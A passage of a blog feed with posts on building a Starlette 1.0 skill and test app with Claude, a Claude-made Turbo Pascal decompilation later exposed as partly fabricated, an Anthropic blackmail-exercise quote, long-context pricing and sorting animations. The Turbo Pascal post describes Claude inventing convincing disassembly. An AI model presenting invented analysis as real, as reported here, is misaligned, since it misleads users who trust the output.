    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="supply-chain"/><category term="ai-security-research"/></entry><entry><title>Experimenting with Starlette 1.0 with Claude skills</title><link href="https://simonwillison.net/2026/Mar/22/starlette/#atom-tag" rel="alternate"/><published>2026-03-22T23:57:44+00:00</published><updated>2026-03-22T23:57:44+00:00</updated><id>https://simonwillison.net/2026/Mar/22/starlette/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;a href="https://marcelotryle.com/blog/2026/03/22/starlette-10-is-here/"&gt;Starlette 1.0 is out&lt;/a&gt;! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of &lt;a href="https://fastapi.tiangolo.com/"&gt;FastAPI&lt;/a&gt;, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself.&lt;/p&gt;
&lt;p&gt;Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; project was that it didn't yet promise stability, and I was determined to provide a stable API for Datasette's own plugins... albeit I still haven't been brave enough to ship my own 1.0 release (after 26 alphas and counting)!&lt;/p&gt;
&lt;p&gt;Then in September 2025 Marcelo Trylesinski &lt;a href="https://github.com/Kludex/starlette/discussions/2997"&gt;announced that Starlette and Uvicorn were transferring to their GitHub account&lt;/a&gt;, in recognition of their many years of contributions and to make it easier for them to receive sponsorship against those projects.&lt;/p&gt;
&lt;p&gt;The 1.0 version has a few breaking changes compared to the 0.x series, described in &lt;a href="https://starlette.dev/release-notes/#100rc1-february-23-2026"&gt;the release notes for 1.0.0rc1&lt;/a&gt; that came out in February.&lt;/p&gt;
&lt;p&gt;The most notable of these is a change to how code runs on startup and shutdown. Previously that was handled by &lt;code&gt;on_startup&lt;/code&gt; and &lt;code&gt;on_shutdown&lt;/code&gt; parameters, but the new system uses a neat &lt;a href="https://starlette.dev/lifespan/"&gt;lifespan&lt;/a&gt; mechanism instead based around an &lt;a href="https://docs.python.org/3/library/contextlib.html#contextlib.asynccontextmanager"&gt;async context manager&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-en"&gt;@&lt;span class="pl-s1"&gt;contextlib&lt;/span&gt;.&lt;span class="pl-c1"&gt;asynccontextmanager&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-k"&gt;async&lt;/span&gt; &lt;span class="pl-k"&gt;def&lt;/span&gt; &lt;span class="pl-en"&gt;lifespan&lt;/span&gt;(&lt;span class="pl-s1"&gt;app&lt;/span&gt;):
    &lt;span class="pl-k"&gt;async&lt;/span&gt; &lt;span class="pl-k"&gt;with&lt;/span&gt; &lt;span class="pl-en"&gt;some_async_resource&lt;/span&gt;():
        &lt;span class="pl-en"&gt;print&lt;/span&gt;(&lt;span class="pl-s"&gt;"Run at startup!"&lt;/span&gt;)
        &lt;span class="pl-k"&gt;yield&lt;/span&gt;
        &lt;span class="pl-en"&gt;print&lt;/span&gt;(&lt;span class="pl-s"&gt;"Run on shutdown!"&lt;/span&gt;)

&lt;span class="pl-s1"&gt;app&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-en"&gt;Starlette&lt;/span&gt;(
    &lt;span class="pl-s1"&gt;routes&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-s1"&gt;routes&lt;/span&gt;,
    &lt;span class="pl-s1"&gt;lifespan&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-s1"&gt;lifespan&lt;/span&gt;
)&lt;/pre&gt;
&lt;p&gt;If you haven't tried Starlette before it feels to me like an asyncio-native cross between Flask and Django, unsurprising since creator Kim Christie is also responsible for Django REST Framework. Crucially, this means you can write most apps as a single Python file, Flask style.&lt;/p&gt;
&lt;p&gt;This makes it &lt;em&gt;really&lt;/em&gt; easy for LLMs to spit out a working Starlette app from a single prompt.&lt;/p&gt;
&lt;p&gt;There's just one problem there: if 1.0 breaks compatibility with the Starlette code that the models have been trained on, how can we have them generate code that works with 1.0?&lt;/p&gt;
&lt;p&gt;I decided to see if I could get this working &lt;a href="https://simonwillison.net/2025/Oct/16/claude-skills/"&gt;with a Skill&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="building-a-skill-with-claude"&gt;Building a Skill with Claude&lt;/h4&gt;
&lt;p&gt;Regular Claude Chat on &lt;a href="https://claude.ai/"&gt;claude.ai&lt;/a&gt; has skills, and one of those default skills is the &lt;a href="https://github.com/anthropics/skills/blob/main/skills/skill-creator/SKILL.md"&gt;skill-creator skill&lt;/a&gt;. This means Claude knows how to build its own skills.&lt;/p&gt;
&lt;p&gt;So I started &lt;a href="https://claude.ai/share/b537c340-aea7-49d6-a14d-3134aa1bd957"&gt;a chat session&lt;/a&gt; and told it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Clone Starlette from GitHub - it just had its 1.0 release. Build a skill markdown document for this release which includes code examples of every feature.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I didn't even tell it where to find the repo, Starlette is widely enough known that I expected it could find it on its own.&lt;/p&gt;
&lt;p&gt;It ran &lt;code&gt;git clone https://github.com/encode/starlette.git&lt;/code&gt; which is actually the old repository name, but GitHub handles redirects automatically so this worked just fine.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://github.com/simonw/research/blob/main/starlette-1-skill/SKILL.md"&gt;resulting skill document&lt;/a&gt; looked very thorough to me... and then I noticed a new button at the top I hadn't seen before labelled "Copy to your skills". So I clicked it:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/skill-button.jpg" alt="Screenshot of the Claude.ai interface showing a conversation titled &amp;quot;Starlette 1.0 skill document with code examples.&amp;quot; The left panel shows a chat where the user prompted: &amp;quot;Clone Starlette from GitHub - it just had its 1.0 release. Build a skill markdown document for this release which includes code examples of every feature.&amp;quot; Claude's responses include collapsed sections labeled &amp;quot;Strategized cloning repository and documenting comprehensive feature examples,&amp;quot; &amp;quot;Examined version details and surveyed source documentation comprehensively,&amp;quot; and &amp;quot;Synthesized Starlette 1.0 knowledge to construct comprehensive skill documentation,&amp;quot; with intermediate messages like &amp;quot;I'll clone Starlette from GitHub and build a comprehensive skill document. Let me start by reading the skill-creator guide and then cloning the repo,&amp;quot; &amp;quot;Now let me read through all the documentation files to capture every feature:&amp;quot; and &amp;quot;Now I have a thorough understanding of the entire codebase. Let me build the comprehensive skill document.&amp;quot; The right panel shows a skill preview pane with buttons &amp;quot;Copy to your skills&amp;quot; and &amp;quot;Copy&amp;quot; at the top, and a Description section reading: &amp;quot;Build async web applications and APIs with Starlette 1.0, the lightweight ASGI framework for Python. Use this skill whenever a user wants to create an async Python web app, REST API, WebSocket server, or ASGI application using Starlette. Triggers include mentions of 'Starlette', 'ASGI', async Python web frameworks, or requests to build lightweight async APIs, WebSocket services, streaming responses, or middleware pipelines. Also use when the user is working with FastAPI internals (which is built on Starlette), needs ASGI middleware patterns, or wants a minimal async web server&amp;quot; (text truncated)." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And now my regular Claude chat has access to that skill!&lt;/p&gt;
&lt;h4 id="a-task-management-demo-app"&gt;A task management demo app&lt;/h4&gt;
&lt;p&gt;I started &lt;a href="https://claude.ai/share/b5285fbc-5849-4939-b473-dcb66f73503b"&gt;a new conversation&lt;/a&gt; and prompted:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Build a task management app with Starlette, it should have projects and tasks and comments and labels&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And Claude did exactly that, producing a simple GitHub Issues clone using Starlette 1.0, a SQLite database (via &lt;a href="https://github.com/omnilib/aiosqlite"&gt;aiosqlite&lt;/a&gt;) and a Jinja2 template.&lt;/p&gt;
&lt;p&gt;Claude even tested the app manually like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;&lt;span class="pl-c1"&gt;cd&lt;/span&gt; /home/claude/taskflow &lt;span class="pl-k"&gt;&amp;amp;&amp;amp;&lt;/span&gt; timeout 5 python -c &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;import asyncio&lt;/span&gt;
&lt;span class="pl-s"&gt;from database import init_db&lt;/span&gt;
&lt;span class="pl-s"&gt;asyncio.run(init_db())&lt;/span&gt;
&lt;span class="pl-s"&gt;print('DB initialized successfully')&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;2&amp;gt;&amp;amp;1&lt;/span&gt;

pip install httpx --break-system-packages -q \
  &lt;span class="pl-k"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="pl-c1"&gt;cd&lt;/span&gt; /home/claude/taskflow &lt;span class="pl-k"&gt;&amp;amp;&amp;amp;&lt;/span&gt; \
  python -c &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;from starlette.testclient import TestClient&lt;/span&gt;
&lt;span class="pl-s"&gt;from main import app&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;client = TestClient(app)&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.get('/api/stats')&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Stats:', r.json())&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.get('/api/projects')&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Projects:', len(r.json()), 'found')&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.get('/api/tasks')&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Tasks:', len(r.json()), 'found')&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.get('/api/labels')&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Labels:', len(r.json()), 'found')&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.get('/api/tasks/1')&lt;/span&gt;
&lt;span class="pl-s"&gt;t = r.json()&lt;/span&gt;
&lt;span class="pl-s"&gt;print(f'Task 1: &lt;span class="pl-cce"&gt;\"&lt;/span&gt;{t[&lt;span class="pl-cce"&gt;\"&lt;/span&gt;title&lt;span class="pl-cce"&gt;\"&lt;/span&gt;]}&lt;span class="pl-cce"&gt;\"&lt;/span&gt; - {len(t[&lt;span class="pl-cce"&gt;\"&lt;/span&gt;comments&lt;span class="pl-cce"&gt;\"&lt;/span&gt;])} comments, {len(t[&lt;span class="pl-cce"&gt;\"&lt;/span&gt;labels&lt;span class="pl-cce"&gt;\"&lt;/span&gt;])} labels')&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.post('/api/tasks', json={'title':'Test task','project_id':1,'priority':'high','label_ids':[1,2]})&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Created task:', r.status_code, r.json()['title'])&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.post('/api/comments', json={'task_id':1,'content':'Test comment'})&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Created comment:', r.status_code)&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;r = client.get('/')&lt;/span&gt;
&lt;span class="pl-s"&gt;print('Homepage:', r.status_code, '- length:', len(r.text))&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;print('\nAll tests passed!')&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For all of the buzz about Claude Code, it's easy to overlook that Claude itself counts as a coding agent now, fully able to both write and then test the code that it is writing.&lt;/p&gt;
&lt;p&gt;Here's what the resulting app looked like. The code is &lt;a href="https://github.com/simonw/research/blob/main/starlette-1-skill/taskflow"&gt;here in my research repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/taskflow.jpg" alt="Screenshot of a dark-themed Kanban board app called &amp;quot;TaskFlow&amp;quot; showing the &amp;quot;Website Redesign&amp;quot; project. The left sidebar has sections &amp;quot;OVERVIEW&amp;quot; with &amp;quot;Dashboard&amp;quot;, &amp;quot;All Tasks&amp;quot;, and &amp;quot;Labels&amp;quot;, and &amp;quot;PROJECTS&amp;quot; with &amp;quot;Website Redesign&amp;quot; (1) and &amp;quot;API Platform&amp;quot; (0). The main area has three columns: &amp;quot;TO DO&amp;quot; (0) showing &amp;quot;No tasks&amp;quot;, &amp;quot;IN PROGRESS&amp;quot; (1) with a card titled &amp;quot;Blog about Starlette 1.0&amp;quot; tagged &amp;quot;MEDIUM&amp;quot; and &amp;quot;Documentation&amp;quot;, and &amp;quot;DONE&amp;quot; (0) showing &amp;quot;No tasks&amp;quot;. Top-right buttons read &amp;quot;+ New Task&amp;quot; and &amp;quot;Delete&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/asgi"&gt;asgi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/kim-christie"&gt;kim-christie&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/skills"&gt;skills&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/starlette"&gt;starlette&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="open-source"/><category term="python"/><category term="ai"/><category term="asgi"/><category term="kim-christie"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="claude"/><category term="coding-agents"/><category term="skills"/><category term="agentic-engineering"/><category term="starlette"/></entry><entry><title>Turbo Pascal 3.02A, deconstructed</title><link href="https://simonwillison.net/2026/Mar/20/turbo-pascal/#atom-tag" rel="alternate"/><published>2026-03-20T23:59:14+00:00</published><updated>2026-03-20T23:59:14+00:00</updated><id>https://simonwillison.net/2026/Mar/20/turbo-pascal/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://tools.simonwillison.net/turbo-pascal-deconstructed"&gt;Turbo Pascal 3.02A, deconstructed&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
In &lt;a href="https://prog21.dadgum.com/116.html"&gt;Things That Turbo Pascal is Smaller Than&lt;/a&gt; James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.&lt;/p&gt;
&lt;p&gt;This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.&lt;/p&gt;
&lt;p&gt;It did a great job, so I had it create &lt;a href="https://tools.simonwillison.net/turbo-pascal-deconstructed"&gt;this interactive artifact&lt;/a&gt; illustrating the result. Here's the &lt;a href="https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e"&gt;sequence of prompts&lt;/a&gt; I used (in regular &lt;a href="https://claude.ai/"&gt;claude.ai&lt;/a&gt; chat, not Claude Code):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Read this https://prog21.dadgum.com/116.html&lt;/p&gt;
&lt;p&gt;Now find a copy of that binary online&lt;/p&gt;
&lt;p&gt;Explore this (&lt;em&gt;I attached the zip file&lt;/em&gt;)&lt;/p&gt;
&lt;p&gt;Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img alt="Infographic titled &amp;quot;TURBO.COM&amp;quot; with subtitle &amp;quot;Borland Turbo Pascal 3.02A — September 17, 1986 — Deconstructed&amp;quot; on a dark background. Four statistics are displayed: 39,731 TOTAL BYTES, 17 SEGMENTS MAPPED, 1 INT 21H INSTRUCTION, 100+ BUILT-IN IDENTIFIERS. Below is a &amp;quot;BINARY MEMORY MAP — 0X0100 TO 0X9C33&amp;quot; shown as a horizontal color-coded bar chart with a legend listing 17 segments: COM Header &amp;amp; Copyright, Display Configuration Table, Screen I/O &amp;amp; Video BIOS Routines, Keyboard Input Handler, String Output &amp;amp; Number Formatting, DOS System Call Dispatcher, Runtime Library Core, Error Handler &amp;amp; Runtime Errors, File I/O System, Software Floating-Point Engine, x86 Code Generator, Startup Banner &amp;amp; Main Menu Loop, File Manager &amp;amp; Directory Browser, Compiler Driver &amp;amp; Status, Full-Screen Text Editor, Pascal Parser &amp;amp; Lexer, and Symbol Table &amp;amp; Built-in Identifiers." src="https://static.simonwillison.net/static/2026/turbo-pascal.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Annoyingly the &lt;a href="https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e"&gt;Claude share link&lt;/a&gt; doesn't show the actual code that Claude executed, but here's &lt;a href="https://static.simonwillison.net/static/2026/turbo-pascal-analysis.zip"&gt;the zip file&lt;/a&gt; it gave me when I asked to download all of the intermediate files.&lt;/p&gt;
&lt;p&gt;I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result!&lt;/p&gt;
&lt;h4 id="hallucinated-slop"&gt;Turns out it's hallucinated slop&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Update 2&lt;/strong&gt;, 24th March 2026: rep_lodsb on Hacker News is someone who actually understands assembler, and they reviewed the annotations and &lt;a href="https://news.ycombinator.com/item?id=47471647#47501692"&gt;found them to be hallucinated slop&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[...] Obviously, there has to be a lot more to even a simple-minded x86 code generator than just a generic "emit opcode byte" and "emit call" routine. In general, what A"I" produced here is not a full disassembly but a collection of short snippets, potentially not even including the really interesting ones. But is it even correct?&lt;/p&gt;
&lt;p&gt;EmitByte here is unnecessarily pushing/popping AX, which isn't modified by the few instructions in between at all. No competent assembly language programmer would do this. So maybe against all expectations, Turbo Pascal is just really badly coded? No, it's of course a hallucination: those instructions don't appear in the binary at all! [...]&lt;/p&gt;
&lt;p&gt;But searching for e.g. the hex opcode B0 E8 ('mov al,0xe8') is enough to confirm that this code snippet isn't to be found &lt;em&gt;anywhere&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;There is a lot more suspicious code, including some that couldn't possibly work (like the "ret 1" in the system call dispatcher, which would misalign the stack).&lt;/p&gt;
&lt;p&gt;Conclusion: it's slop&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Because it's amusing to loop this kind of criticism through a model, I &lt;a href="https://claude.ai/share/a64c94eb-c623-4fd4-b101-e3e7d66c77ca"&gt;pasted their feedback into Claude&lt;/a&gt; along with instructions to re-review their the code and it agreed with their assessment:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The commenter's core charge — that the annotated disassembly is "slop" — is substantiated. The artifact presents a mix of genuine analysis (real hex dumps, some correctly disassembled sections) and wholesale fabrication (invented assembly with plausible-sounding labels and comments for roughly half the binary). The fabricated sections look convincing to a casual reader but don't survive byte-level comparison with the actual binary.&lt;/p&gt;
&lt;/blockquote&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/computer-history"&gt;computer-history&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;



</summary><category term="computer-history"/><category term="tools"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/></entry><entry><title>Quoting A member of Anthropic’s alignment-science team</title><link href="https://simonwillison.net/2026/Mar/16/blackmail/#atom-tag" rel="alternate"/><published>2026-03-16T21:38:55+00:00</published><updated>2026-03-16T21:38:55+00:00</updated><id>https://simonwillison.net/2026/Mar/16/blackmail/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.newyorker.com/news/annals-of-inquiry/the-pentagon-went-to-war-with-anthropic-whats-really-at-stake?_sp=9a6e0ff7-2bfd-46f8-a9e1-3941ef2003b5.1773495048769"&gt;&lt;p&gt;The point of &lt;a href="https://simonwillison.net/2025/Jun/20/agentic-misalignment/"&gt;the blackmail exercise&lt;/a&gt; was to have something to describe to policymakers—results that are visceral enough to land with people, and make misalignment risk actually salient in practice for people who had never thought about it before.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.newyorker.com/news/annals-of-inquiry/the-pentagon-went-to-war-with-anthropic-whats-really-at-stake?_sp=9a6e0ff7-2bfd-46f8-a9e1-3941ef2003b5.1773495048769"&gt;A member of Anthropic’s alignment-science team&lt;/a&gt;, as told to Gideon Lewis-Kraus&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-ethics"/></entry><entry><title>1M context is now generally available for Opus 4.6 and Sonnet 4.6</title><link href="https://simonwillison.net/2026/Mar/13/1m-context/#atom-tag" rel="alternate"/><published>2026-03-13T18:29:13+00:00</published><updated>2026-03-13T18:29:13+00:00</updated><id>https://simonwillison.net/2026/Mar/13/1m-context/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://claude.com/blog/1m-context-ga"&gt;1M context is now generally available for Opus 4.6 and Sonnet 4.6&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Here's what surprised me:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Standard pricing now applies across the full 1M window for both models, with no long-context premium.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;OpenAI and Gemini both &lt;a href="https://www.llm-prices.com/#sel=gemini-3-1-pro-preview-200k%2Cgpt-5.4-272k%2Cgemini-3-1-pro-preview%2Cgpt-5.4"&gt;charge more&lt;/a&gt; for prompts where the token count goes above a certain point - 200,000 for Gemini 3.1 Pro and 272,000 for GPT-5.4.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-pricing"&gt;llm-pricing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/long-context"&gt;long-context&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="llm-pricing"/><category term="long-context"/></entry><entry><title>Sorting algorithms</title><link href="https://simonwillison.net/2026/Mar/11/sorting-algorithms/#atom-tag" rel="alternate"/><published>2026-03-11T22:58:06+00:00</published><updated>2026-03-11T22:58:06+00:00</updated><id>https://simonwillison.net/2026/Mar/11/sorting-algorithms/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://tools.simonwillison.net/sort-algorithms"&gt;Sorting algorithms&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Today in animated explanations built using Claude: I've always been a fan of animated demonstrations of sorting algorithms so I decided to spin some up on my phone using Claude Artifacts, then added Python's timsort algorithm, then a feature to run them all at once. Here's the &lt;a href="https://claude.ai/share/2c09f6f7-57ed-47eb-af2e-fc39ddc4c39f"&gt;full sequence of prompts&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Interactive animated demos of the most common sorting algorithms&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This gave me bubble sort, selection sort, insertion sort, merge sort, quick sort, and heap sort.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Add timsort, look up details in a clone of python/cpython from GitHub&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's add Python's &lt;a href="https://en.wikipedia.org/wiki/Timsort"&gt;Timsort&lt;/a&gt;! Regular Claude chat can clone repos from GitHub these days. In the transcript you can see it clone the repo and then consult &lt;a href="https://github.com/python/cpython/blob/d19de375a204c74ab5f3a28ec42335bae139033d/Objects/listsort.txt"&gt;Objects/listsort.txt&lt;/a&gt; and &lt;a href="https://github.com/python/cpython/blob/d19de375a204c74ab5f3a28ec42335bae139033d/Objects/listobject.c"&gt;Objects/listobject.c&lt;/a&gt;. (I should note that when I asked GPT-5.4 Thinking to review Claude's implementation &lt;a href="https://chatgpt.com/share/69b1fc93-f360-8006-b8b7-22c3da639367"&gt;it picked holes in it&lt;/a&gt; and said the code "is a simplified, Timsort-inspired adaptive mergesort".)&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I don't like the dark color scheme on the buttons, do better&lt;/p&gt;
&lt;p&gt;Also add a "run all" button which shows smaller animated charts for every algorithm at once in a grid and runs them all at the same time&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It came up with a color scheme I liked better, "do better" is a fun prompt, and now the "Run all" button produces this effect:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Animated sorting algorithm race visualization titled &amp;quot;All algorithms racing&amp;quot; with controls for SIZE (50) and SPEED (100), Stop and Shuffle buttons, and a &amp;quot;Back to single&amp;quot; button. A legend shows Comparing (pink), Swapping (orange), Pivot (red), and Sorted (purple) indicators. Seven algorithms race simultaneously in card panels: Bubble sort (Sorting… — Comparisons: 312, Swaps: 250), Selection sort (Sorting… — Comparisons: 550, Swaps: 12), Insertion sort (Sorting… — Comparisons: 295, Swaps: 266), Merge sort (#3 — Comparisons: 225, Swaps: 225), Quick sort (#2 — Comparisons: 212, Swaps: 103), Heap sort (Sorting… — Comparisons: 358, Swaps: 203), and Timsort (#1 — Comparisons: 215, Swaps: 332). Finished algorithms (Timsort, Quick sort, Merge sort) display fully sorted purple bar charts and are highlighted with purple borders." src="https://static.simonwillison.net/static/2026/sorts-32-colors-lossy.gif" /&gt;


